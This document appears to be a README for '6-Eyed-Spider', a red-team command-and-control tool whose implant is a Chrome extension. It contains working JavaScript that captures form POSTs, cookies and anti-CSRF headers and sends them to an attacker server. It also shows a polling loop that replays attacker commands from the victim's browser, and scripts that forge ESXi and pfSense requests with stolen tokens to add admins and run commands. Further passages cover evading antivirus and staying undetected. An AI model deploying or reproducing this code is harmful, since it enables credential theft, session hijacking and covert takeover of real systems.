6-Eyed-Spider Post-Exploitation Red-Team Tool

Nowadays, there are many command-and-control projects. However, most existing C2s operate at the level of the operating system; we rarely see a C2 that controls a specific part of an operating system, such as the browser.

6-Eyed-Spider is the first of its kind: essentially a C2 that targets browsers. Its implants are browser extensions that gather all data going out of and coming into the browser and receive commands from the 6-Eyed-Spider server.


Hypothesis

6-Eyed-Spider is a post-exploitation red-teaming tool. It gathers data going out of and coming into the browser, such as POST requests, cookies, and chosen headers (for example, anti-CSRF headers), then sends everything to Strapi. Strapi and MongoDB store the data so that 6-Eyed-Spider-CLI can use it to perform specific attacks: attacks that use the users' valid cookies to execute commands, create admin users, enable unsafe functionality, and manipulate data in systems like VMware, pfSense, and PAN-OS.

The tool takes advantage of how web applications are usually designed. No matter how many authentication steps a web application uses, there will be a weak point where, if you know specific tokens, you can interact with the application without reauthenticating. The tool uses these tokens to perform critical tasks as authenticated users. It also handles anti-CSRF protection; thus, almost every request can be replayed.

The tool consists of a couple of parts:

  • Dockerized MongoDB and Strapi
    • MongoDB stores the collected data.
    • Strapi receives and manages the collected data.
  • Google Chrome extension
    • Collects the browser’s data from the blue team.
  • 6-Eyed-Spider-CLI
    • Runs custom-made plugins that make use of the collected data.

Tool requirements and characteristics - Research tasks

6-Eyed-Spider is a covert channel that exfiltrates data over the HTTP protocol, which classifies it as a "subliminal" post-exploitation tool: it operates after the exploitation stage, with the caveat that its communication must look standard and typical for the platform. It achieves this by using the browser itself (in this case, Chrome) to send the data, without spawning any additional processes.

Robustness

Due to the number of packets going out of and into browsers, it is reasonable to predict that victims will not think twice about their browser's traffic. This tool could stay undiscovered for the whole competition period unless the blue team blocks ports 80/443 for all binaries, including the installed browsers, and it is very rare for blue teamers to cut off their own browser traffic. They might block ports 80/443 at the firewall, but most of the time they make an exception for their browsers so they can reach the sites they need. In IRSec competitions, they need to reach their ESXi hosts to use their VMs; thus, browser access is inevitable.

Detection

Browser extensions are usually just JavaScript files, so antiviruses don't scan them. Moreover, many extensions share the same type of code: the extension calls ordinary functions and then sends data over HTTP, which doesn't look unusual for a browser.

Prevention

The tool also needs to consider how to prevent detection. The current version is not verified by the Google Chrome or Firefox extension stores; thus, Developer mode has to be enabled in the browser for the extension to work, and Developer mode is a flag for users since it is not the standard mode any user would run in. It is only visible if the user opens the extensions page, though. To remove even that indicator, a modified version of the tool could be published to the Google and Firefox extension stores; this way, the extension can be verified and used without switching to Developer mode.

How I designed it

I used JavaScript to build the Google Chrome extension; Strapi on Node.js (a JavaScript runtime built on Chrome's V8 JavaScript engine) for the server; and Python to build a beautiful command-line interface.

How it works

Browser extension functionalities:

It gathers data going out of and coming into the browser, such as POST requests, cookies, and chosen headers (for example, anti-CSRF headers), then sends everything to Strapi. Strapi and MongoDB store the data so that 6-Eyed-Spider-CLI can use the collected data to perform specific attacks, as sketched below.
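
As an illustration, a simplified background-script sketch of this collection loop might look like the following. The payload fields mirror the /Posts schema documented below, but the listener wiring and the Strapi address are assumptions for the sketch, not the shipped extension code.

// background.js: simplified sketch of the collection loop (an assumption, not the shipped code).
// Assumes manifest.json grants the "webRequest", "cookies", and host permissions.
const STRAPI = "http://127.0.0.1:1337"; // assumption: address of your Strapi instance

// Forward one record to the public /Posts endpoint (schema described below).
function report(site, type, data) {
  fetch(`${STRAPI}/Posts`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ IP: "", ID: String(Date.now()), Site: site, Data: data, Type: type }),
  }).catch(() => {}); // fail silently; the implant should never draw attention
}

// Capture outgoing POST bodies (login forms and the like).
chrome.webRequest.onBeforeRequest.addListener(
  (details) => {
    if (details.method === "POST" && details.requestBody && details.requestBody.formData) {
      report(details.url, "Form", details.requestBody.formData);
    }
  },
  { urls: ["<all_urls>"] },
  ["requestBody"]
);

// Capture chosen request headers, e.g. anti-CSRF headers.
chrome.webRequest.onSendHeaders.addListener(
  (details) => {
    const wanted = (details.requestHeaders || []).filter((h) => /csrf/i.test(h.name));
    if (wanted.length) report(details.url, "Header", wanted);
  },
  { urls: ["<all_urls>"] },
  ["requestHeaders"]
);

// Capture cookies as they are set or updated.
chrome.cookies.onChanged.addListener(({ removed, cookie }) => {
  if (!removed) report(cookie.domain, "Cookie", { [cookie.name]: cookie.value });
});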

6-Eyed-Spider-CLI functionalities:

6-Eyed-Spider-CLI is the tool's command-line interface. Using it, an attacker can forge requests directly or send commands to the browser extension so that it issues requests on behalf of the attacker.

The difference between the two functionalities is where the request originates: in the first, the forged request is sent from the attacker's machine; in the second, the request is sent directly from the victim's device via the browser.
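
The second mode implies a command channel from the server down to the implant. The exact mechanism is internal to the tool; a plausible minimal sketch is the extension polling a hypothetical /Commands endpoint (an assumption, not the documented API) and replaying each entry from inside the victim's browser, so the victim's own cookies are attached automatically:

// Hypothetical polling loop inside the extension. The /Commands endpoint and the
// record shape ({ url, method, body }) are assumptions, not the documented API.
const STRAPI = "http://127.0.0.1:1337";

setInterval(async () => {
  const res = await fetch(`${STRAPI}/Commands`).catch(() => null);
  if (!res || !res.ok) return;
  for (const cmd of await res.json()) {
    // Issued from the victim's browser, so their session cookies ride along.
    fetch(cmd.url, { method: cmd.method, credentials: "include", body: cmd.body }).catch(() => {});
  }
}, 30000); // poll every 30 seconds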

Dockerized MongoDB and Strapi functionalities:

Strapi is what the extension communicates with. It exposes multiple endpoints, each of which receives a specific kind of data, and the extension is programmed to send each piece of data to the matching endpoint according to its type.
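
On the other side, 6-Eyed-Spider-CLI reads those records back out of the same API. The actual CLI is written in Python; the sketch below uses JavaScript for consistency with the other snippets and assumes Strapi v3's default REST filter syntax (the _eq and _contains suffixes):

// Pull every stored record of type "Cookie" for a given site out of Strapi.
// Filter syntax (Type_eq, Site_contains) assumes Strapi v3's default REST API.
const STRAPI = "http://127.0.0.1:1337";

async function cookiesFor(site) {
  const url = `${STRAPI}/Posts?Type_eq=Cookie&Site_contains=${encodeURIComponent(site)}`;
  const res = await fetch(url);
  if (!res.ok) throw new Error(`Strapi returned ${res.status}`);
  return res.json(); // array of { IP, ID, Site, Data, Type } records
}

cookiesFor("192.168.1.254").then((records) => {
  for (const r of records) console.log(r.Site, r.Data);
});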

6-Eyed-Spider-CLI runs customized plugins that make use of the valid data collected from the API. (I might add more to them.)

  • VMware

    • Add an administrator
    • Start SSH
  • pfSense

    • Add an administrator
    • Execute a command

VMware:

On the VMware web interface, there are four important tokens: vmware_client, vmware_soap_session, VMware_CSRF_Token, and SOAPAction. The browser extension keeps track of them and updates Strapi. Whenever the red team wants to add an administrator, 6-Eyed-Spider-CLI can forge a request as an admin or ask the extension to issue a request on behalf of the attackers.
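
As a sketch of the forging mode: the ESXi UI talks SOAP to the host, so a replayed request carries the captured cookies plus the VMware_CSRF_Token and SOAPAction values. The /sdk path, the header names, and the SOAP body below are placeholders and assumptions, not the plugin's exact payload:

// Sketch: forge an ESXi SOAP request with captured tokens (Node 18+, whose fetch,
// unlike browser fetch, allows a manual Cookie header). Token values are placeholders
// and would come from Strapi. Self-signed ESXi certificates may require
// NODE_TLS_REJECT_UNAUTHORIZED=0.
const ESXI_IP = "192.168.1.10";
const tokens = {
  vmware_client: "VMware",
  vmware_soap_session: "<captured session id>",
  VMware_CSRF_Token: "<captured CSRF token>",
  SOAPAction: "<captured SOAPAction value>",
};

fetch(`https://${ESXI_IP}/sdk`, {
  method: "POST",
  headers: {
    "Content-Type": "text/xml",
    SOAPAction: tokens.SOAPAction,
    "VMware-CSRF-Token": tokens.VMware_CSRF_Token, // header name assumed
    Cookie: `vmware_client=${tokens.vmware_client}; vmware_soap_session=${tokens.vmware_soap_session}`,
  },
  body: "<soapenv:Envelope>...</soapenv:Envelope>", // placeholder: the add-user SOAP call
}).then((res) => console.log(res.status));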

pfSense:

To add an administrator or execute a command on pfSense, two tokens are needed: PHPSESSID and csrf_magic. We could ask the extension to collect the PHPSESSID and csrf_magic tokens from every browser under control and then forge requests as admins; the logs will then show the admin themselves as the one who executed the command or added the user. Or we could ask the extension itself to issue a request with PHPSESSID and csrf_magic on our behalf.
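
A forged pfSense request is then just an ordinary form POST carrying the PHPSESSID cookie and the CSRF token. The sketch below targets diag_command.php, pfSense's command-prompt page; the form field names (__csrf_magic, txtCommand) are assumptions about that page, not documented plugin internals:

// Sketch: execute a shell command on pfSense with captured tokens (Node 18+).
// PHPSESSID and csrf_magic would come from Strapi; values here are placeholders.
const PFSENSE = "https://192.168.1.254";
const PHPSESSID = "<captured PHPSESSID>";
const csrfMagic = "<captured csrf_magic>";

const form = new URLSearchParams({
  __csrf_magic: csrfMagic, // field name assumed
  txtCommand: "whoami",    // field name assumed
  submit: "EXEC",
});

fetch(`${PFSENSE}/diag_command.php`, {
  method: "POST",
  headers: {
    Cookie: `PHPSESSID=${PHPSESSID}`,
    "Content-Type": "application/x-www-form-urlencoded",
  },
  body: form.toString(),
})
  .then((res) => res.text())
  .then(console.log);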

How to:

Use 6-Eyed-Spider-CLI:

Welcome! Type ? to list commands
6-Eyed-Spider> ?

Documented commands (type help <topic>):
========================================
Add_ESXI_Admin           Print_all_ESXis_under_control     exit
ESXI_Enable_SSH          Print_all_pfSenses_under_control  help
Execute_pfSense_Command  Print_creds

6-Eyed-Spider> help Add_ESXI_Admin
Add admin user.
Usage: Add_ESXI_Admin <ESXI_IP> <USERNAME> <STRONG_PASSWORD> <Description>
Add_ESXI_Admin 192.168.1.10 BLACK_TEAM Liverpool!1!1! Description1
Add_ESXI_Admin 192.168.1.10 ADMIN Liverpool!1998 Description2

6-Eyed-Spider> help Execute_pfSense_Command
Execute a command.
Usage: Execute_pfSense_Command <pfSense_IP> <Command>
Execute_pfSense_Command 192.168.1.10 id
Execute_pfSense_Command 192.168.1.10 whoami

6-Eyed-Spider> Execute_pfSense_Command 192.168.1.254 whoami

root

6-Eyed-Spider> Print_all_pfSenses_under_control

https://192.168.1.254/
https://192.168.2.254/
https://192.168.3.254/
https://192.168.4.254/

6-Eyed-Spider>

Install 6-Eyed-Spider:

[M507:~]$ bash Install.sh

Run the server manually:

[M507:~]$ # Start the database
[M507:~]$ docker-compose -f docker-compose-db.yml up --build -d
[M507:~]$ # Wait 20 seconds until its state changes to healthy
[M507:~]$ watch docker-compose -f docker-compose-db.yml ps
[M507:~]$ # Insert the database dump into the database using this command
[M507:~]$ docker exec -i strapi-docker_db_1 sh -c 'mongorestore --archive' < RedAdmin.dump
[M507:~]$ # Start Strapi
[M507:~]$ docker-compose -f docker-compose-main.yml up --build -d

Or run Run.sh, which executes the same commands above.

[M507:~]$ bash Run.sh

Configure the admin panel and the API address from:

[M507:~]$ cat ./strapi-app/config/environments/development/server.json
{
  "host": "localhost",
  "port": 1337,
  "proxy": {
   "enabled": false
  },
  "autoReload": {
    "enabled": true
  },
  "cron": {
    "enabled": false
  },
  "admin": {
    "autoOpen": false
  }
}

Info ☄️ Default Admin panel: http://localhost:1337/admin
Info ⚡️ Default Server: http://localhost:1337

Then with administrator privileges:

Default credentials: admin:RedAdmin

  • Insert all the targeted domains into: http://127.0.0.1:1337/Domains
  • Insert all the targeted headers into: http://127.0.0.1:1337/Headers
  • http://127.0.0.1:1337/Posts receives data from the public without any privileges.
  • /Posts receives: IP (String), ID (String), Site (String), Data (JSON), and Type (String). Type is either “Cookie”, “Header”, or “Form”. An example:
    {
      "IP": "192.168.1.2",
      "ID": "31231",
      "Site": "https://aavtrain.com/index.asp",
      "Data": {
          "Submit": "Submit",
          "login": "true",
          "password": "MYPASSWORD",
          "user_name": "admin"
      },
      "Type": "Form"
    }
    

Clients:

Microsoft Windows [Version 10.0.17763.503]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Mohad> .\New-ChromeExtension.ps1 (PowerShell payload attached).

6-Eyed-Spider-CLI Plugins:

6-Eyed-Spider-CLI runs customized plugins that make use of the valid collected data from the API.

  • VMware
    • Add an administrator
    • Start SSH
  • pfSense
    • Add an administrator
    • Execute a command

Dependencies

  • Docker-compose

Future Work

  • Firefox extension that configures itself based on the data in /Domains and /Headers.
  • Firefox extension that sends all POST requests and cookies to /Posts as described above.
  • New-FirefoxExtension.ps1

The repo: 6-Eyed-Spider.